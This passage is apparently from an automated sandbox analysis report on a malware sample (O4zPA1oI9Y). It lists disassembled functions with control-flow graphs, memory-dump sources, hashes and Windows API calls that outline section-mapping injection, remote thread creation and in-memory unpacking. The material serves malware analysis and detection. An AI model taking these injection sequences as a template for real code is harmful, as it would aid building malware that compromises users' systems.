                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                                            Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 172nativethreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 371 402f97-402fbb 372 402fc1-402fd9 371->372 373 4030ee-4030f3 371->373 372->373 374 402fdf-402ff0 372->374 375 402ff2-402ffb 374->375 376 403000-40300e 375->376 376->376 377 403010-403017 376->377 378 403039-403040 377->378 379 403019-40301c 377->379 380 403042-403044 378->380 382 403062-403065 378->382 379->380 381 40301e-403027 379->381 383 403045 380->383 381->383 384 403029-403038 381->384 385 403067-40306a 382->385 386 40306e 382->386 387 403047-403061 383->387 388 40306b-40306c 383->388 384->378 385->386 385->388 386->375 389 40306f 386->389 387->382 390 403070-403075 388->390 389->390 390->373 391 403077-40307a 390->391 391->373 392 40307c-4030eb RtlCreateUserThread NtTerminateProcess 391->392 392->373
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                                                                            • Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
                                                                                                                            • Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                                                                            • Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5
                                                                                                                            Function 00622A07 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 393 622a07-622a20 394 622a22-622a24 393->394 395 622a26 394->395 396 622a2b-622a37 CreateToolhelp32Snapshot 394->396 395->396 397 622a47-622a54 Module32First 396->397 398 622a39-622a3f 396->398 399 622a56-622a57 call 6226c6 397->399 400 622a5d-622a65 397->400 398->397 405 622a41-622a45 398->405 403 622a5c 399->403 403->400 405->394 405->397
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00622A2F
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00622A4F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_61f000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: d6d409dfb297d282ac6a805e23bd18f4036b36d86e9f40f17b8723ffcf9f3f8b
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: E2F06232500B227BD7303BB5AC9DBAA76E9AF49724F100628E642919C0DA70E8458A65
                                                                                                                            Function 005F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 68 5f003c-5f0047 69 5f004c-5f0263 call 5f0a3f call 5f0e0f call 5f0d90 VirtualAlloc 68->69 70 5f0049 68->70 85 5f028b-5f0292 69->85 86 5f0265-5f0289 call 5f0a69 69->86 70->69 88 5f02a1-5f02b0 85->88 90 5f02ce-5f03c2 VirtualProtect call 5f0cce call 5f0ce7 86->90 88->90 91 5f02b2-5f02cc 88->91 97 5f03d1-5f03e0 90->97 91->88 98 5f0439-5f04b8 VirtualFree 97->98 99 5f03e2-5f0437 call 5f0ce7 97->99 101 5f04be-5f04cd 98->101 102 5f05f4-5f05fe 98->102 99->97 104 5f04d3-5f04dd 101->104 105 5f077f-5f0789 102->105 106 5f0604-5f060d 102->106 104->102 108 5f04e3-5f0505 104->108 109 5f078b-5f07a3 105->109 110 5f07a6-5f07b0 105->110 106->105 111 5f0613-5f0637 106->111 122 5f0517-5f0520 108->122 123 5f0507-5f0515 108->123 109->110 113 5f086e-5f08be LoadLibraryA 110->113 114 5f07b6-5f07cb 110->114 112 5f063e-5f0648 111->112 112->105 115 5f064e-5f065a 112->115 121 5f08c7-5f08f9 113->121 117 5f07d2-5f07d5 114->117 115->105 120 5f0660-5f066a 115->120 118 5f07d7-5f07e0 117->118 119 5f0824-5f0833 117->119 125 5f07e4-5f0822 118->125 126 5f07e2 118->126 128 5f0839-5f083c 119->128 127 5f067a-5f0689 120->127 129 5f08fb-5f0901 121->129 130 5f0902-5f091d 121->130 124 5f0526-5f0547 122->124 123->124 131 5f054d-5f0550 124->131 125->117 126->119 132 5f068f-5f06b2 127->132 133 5f0750-5f077a 127->133 128->113 134 5f083e-5f0847 128->134 129->130 135 5f0556-5f056b 131->135 136 5f05e0-5f05ef 131->136 137 5f06ef-5f06fc 132->137 138 5f06b4-5f06ed 132->138 133->112 139 5f084b-5f086c 134->139 140 5f0849 134->140 142 5f056f-5f057a 135->142 143 5f056d 135->143 136->104 144 5f06fe-5f0748 137->144 145 5f074b 137->145 138->137 139->128 140->113 146 5f057c-5f0599 142->146 147 5f059b-5f05bb 142->147 143->136 144->145 145->127 152 5f05bd-5f05db 146->152 147->152 152->131
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14
                                                                                                                            Function 00418AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 370 418af0-418c30 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00514D70), ref: 00418BCF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418C0C
                                                                                                                            • VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418C2B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction ID: 441cc07c50422e985bd597f44fd2245cc03bf1e09111bb194a1dfbca8cfcce31
                                                                                                                            • Opcode Fuzzy Hash: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction Fuzzy Hash: 88314918508680CAEB01DB78FC057923B66AB75709F04E0B9D14C8B7B1D7BB051E9B6A
                                                                                                                            Function 005F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 406 5f0e0f-5f0e24 SetErrorMode * 2 407 5f0e2b-5f0e2c 406->407 408 5f0e26 406->408 408->407
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5
                                                                                                                            Function 004016E5 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 409 4016e5 410 4016e7 409->410 411 4016ec-4016f0 409->411 410->411 412 4016e9 410->412 413 4016f2-401725 411->413 414 401716-401737 411->414 412->411 413->414 422 40173a-401771 414->422 433 401773-40179c 422->433 438 4017a6 433->438 439 40179e-4017a4 433->439 440 4017ac-4017b2 438->440 439->440 441 4017c2-4017c6 440->441 442 4017b4-4017c0 440->442 441->440 443 4017c8-4017cd 441->443 442->441 444 401835-401844 443->444 445 4017cf call 4017d4 443->445 447 401847-40184a 444->447 445->444 448 401874-4018b7 HeapCreate 447->448 449 40184c-401856 447->449 459 4018c5 448->459 460 4018bc-4018e3 call 401193 448->460 450 401859-401862 449->450 452 401870 450->452 453 401864-40186e 450->453 452->450 455 401872 452->455 453->452 455->447 459->460
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction ID: d7122d48263ec7d897cf7d78cd76de1228cda3bcac40411fc7d625d9091ea59c
                                                                                                                            • Opcode Fuzzy Hash: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction Fuzzy Hash: AC41CE37908104DBDB14AA54C844ABA73A1AF84304F39853BD857776F0D67CAA43E79F
                                                                                                                            Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 467 4018e6-40194b call 401193 Sleep call 40141f 481 40195a-4019a5 call 401193 467->481 482 40194d-401955 call 401514 467->482 482->481
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                                            Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 496 401915-401918 497 4018c6-4018c7 496->497 498 40191a-40194b call 401193 Sleep call 40141f 496->498 500 4018d7 497->500 501 4018ce-4018e3 call 401193 497->501 510 40195a-4019a5 call 401193 498->510 511 40194d-401955 call 401514 498->511 500->501 511->510
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                                            Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 525 4018f1-40194b call 401193 Sleep call 40141f 535 40195a-4019a5 call 401193 525->535 536 40194d-401955 call 401514 525->536 536->535
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                            Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                            Function 006226C6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00622717
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_61f000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 89379c13cdc3fd01e8c479bc6b2a39c727dea2dfba733d8804d139b32b44c1f2
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: C6113C79A00208FFDB01DF98C985E99BBF5AF08350F058095F9489B362D371EA90DF80
                                                                                                                            Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                            Function 00418AC0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,00514D6C,0041912F), ref: 00418AC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                            • Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
                                                                                                                            • Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                            • Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16

                                                                                                                            Non-executed Functions

                                                                                                                            Function 005F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .$GetProcAddress.$l
                                                                                                                            • API String ID: 0-2784972518
                                                                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                            • Instruction ID: b437e55aa1150b7aa29c0e0734b87b9c3710736e4c8244c2eae4c773cf33aefc
                                                                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                            • Instruction Fuzzy Hash: E931AEB2900209CFDB10CF88C980AAEBBF5FF48324F18504AD541A7352D3B5EA45CFA4
                                                                                                                            Function 006222E4 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_61f000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: v"b
                                                                                                                            • API String ID: 0-2872282020
                                                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                            • Instruction ID: 003a6cfedbb482608f94e6eb5d0321e57304cfe3eae14289de936a4ae9d77e08
                                                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                            • Instruction Fuzzy Hash: 03113072340511AFD754DF59ECD1FA673EAFB89320B298065ED04CB315D679E842CB60
                                                                                                                            Function 0040324F Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: b6cce00e44272c3b346c781a71a24066948c2fdd51da7417d00d6227e97d3ecb
                                                                                                                            • Instruction ID: 8b342eda7a34b2dea096b61bc040758592e52e3af04c7588a1bad881e69cb651
                                                                                                                            • Opcode Fuzzy Hash: b6cce00e44272c3b346c781a71a24066948c2fdd51da7417d00d6227e97d3ecb
                                                                                                                            • Instruction Fuzzy Hash: D6F06DA061E281EBDB1A0F296919531BF6C6A1674733805FFD083761D2E23D4B17A25F
                                                                                                                            Function 00403256 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
